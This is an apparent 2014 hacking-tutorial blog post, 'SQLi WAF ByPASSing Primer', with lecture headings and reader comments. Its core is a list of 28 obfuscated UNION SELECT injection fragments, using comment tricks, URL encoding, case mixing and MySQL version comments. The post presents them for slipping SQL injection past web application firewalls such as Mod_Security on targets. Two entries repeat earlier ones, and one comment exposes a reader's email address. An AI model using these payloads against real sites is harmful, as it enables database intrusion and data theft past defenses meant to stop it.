Saturday 22 March 2014



Hello Readers, Whats Up GentelMen?? Everything Fine??

Ah I Hope its Fine :)

As You Guyz Know That in My Evry Primer I've Started From Very Basics and Then Moved Toward Advanced Techniques and it Depends on the Structure of Target Method That if I Have to Explain it or Do it Practically , So Here is Now SQL INJECTION WEB APPLICATION FIREWALLS BYPASSING, and I Hope You Guyz Will Like it Very Much :)


So Lets Start Without Wasting Time,, Right?? Ook ..

Hands on: Lets Begin

KEEP IN MIND THAT THESE WAF's ACTUALLY DEPEND ON SCENARIO THAT HOW WE HAVE TO USE THEM

Lecture #1

IntroDuction to WAFs and Why We Have to ByPASS Them?



Lecture #2

ByPassing Mod_Security and Some Common Union Select Queries

Some Common Union Select Queries are Given Below Which Can be usually Used .



  1. %55nion(%53elect 1,2,3)-- -
  2. +union+distinct+select+
  3. +union+distinctROW+select+
  4. /**//*!12345UNION SELECT*//**/
  5. /**//*!50000UNION SELECT*//**/
  6. /**/UNION/**//*!50000SELECT*//**/
  7. /*!50000UniON SeLeCt*/
  8. union /*!50000%53elect*/
  9. +#uNiOn+#sEleCt
  10. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  11. /*!%55NiOn*/ /*!%53eLEct*/
  12. /*!u%6eion*/ /*!se%6cect*/
  13. +un/**/ion+se/**/lect
  14. uni%0bon+se%0blect
  15. %2f**%2funion%2f**%2fselect
  16. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  17. REVERSE(noinu)+REVERSE(tceles)
  18. /*--*/union/*--*/select/*--*/
  19. union (/*!/**/ SeleCT */ 1,2,3)
  20. /*!union*/+/*!select*/
  21. union+/*!select*/
  22. /**/union/**/select/**/
  23. /**/uNIon/**/sEleCt/**/
  24. /**//*!union*//**//*!select*//**/
  25. /*!uNIOn*/ /*!SelECt*/
  26. +union+distinct+select+
  27. +union+distinctROW+select+
  28. uNiOn aLl sElEcT 



Demonstration:




Lecture #3


WAF ByPass Using SQLMAP






To Be Continued..!!!







SQLi WAF ByPASSing Primer - UrduSecurity Project

  • Uploaded by: Adeel Chaudhary
  • Views:
  • Share

    8 comments:

    1. I never Thought sqlmap can be help ful but u showed me a way , thnx admin waiting for more things to learn from you. Nice

      ReplyDelete
      Replies
      1. Thanks For Your Feed Back, Subscribe to Blog for More Upcoming Videos :)

        Delete
    2. keep it up and keep making good videos :)

      ReplyDelete
      Replies
      1. Thanks For Your Feed Back, Subscribe to Blog for More Upcoming Videos :)

        Delete
    3. PLZ post WAF ByPass Using SQLMAP in HD plz :)

      ReplyDelete
    4. Thnx Dear.. Nyc Tut.. This Iz my Email plzz send me upcomming Videos Irfanhussain0334@gmail.com

      ReplyDelete
    5. Awsome Tut :) Bro !!!!
      Kindly Compelte It with Advance Inejection :) And Post method !!!
      M waiting For Ur Tut :) With Love <3

      ReplyDelete

     
    Copyright © HACK | Designed by Muhammad Adeel | Founder UrduSecurity